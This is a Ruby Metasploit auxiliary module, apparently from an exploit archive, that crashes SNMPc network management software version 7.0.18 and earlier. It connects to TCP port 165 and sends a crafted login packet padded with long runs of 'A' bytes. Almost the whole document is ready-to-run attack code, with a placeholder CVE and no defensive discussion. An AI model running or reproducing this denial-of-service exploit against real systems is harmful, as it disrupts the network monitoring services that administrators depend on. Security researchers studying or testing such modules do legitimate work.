SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta)

Code:
##
# $Id: snmpc.rb 2007-06-03 $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Auxiliary::Dos::Windows::Snmpc < Msf::Auxiliary

  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'      => 'SNMPc ',
      'Description'  => %q{
        This module sends a specially-crafted packet to the service login of snmpc
        causing a denial of service of snmpc.
      },
      'Author'     => [ 'En Douli, Tks to OaiTeam <DouliEn@gmail.com>' ],
      'License'    => MSF_LICENSE,
      'Version'    => '$Revision: 1 $',
      'References'   =>
        [
          [ 'CVE', 'XXXXXXX' ],
        ]))
      
      register_options([Opt::RPORT(165),], self.class)
  end

  def run
    connect
    init = "\x14\x00\x00\x00\x70\xa9\x00\x00\x51\x03\x00\x00\x02\x00\x00\x00\x72\x63\x6f\x6e"
    pkt = "\x29\x00\x00\x00\xbc\xee\x00\x00\x52\x03\x00\x00\x02\x00\x00\x00\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
    pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" * 56
    pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x09"
    pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" * 35
    pkt <<  "\x41\x41\x41\x41\x41\x41\x41\x41\x09\x30\x00"
   
    print_status("Sending dos packet ... ")
   
    sock.put(init)
    sock.put(pkt)
   
    disconnect
  end

end
end  
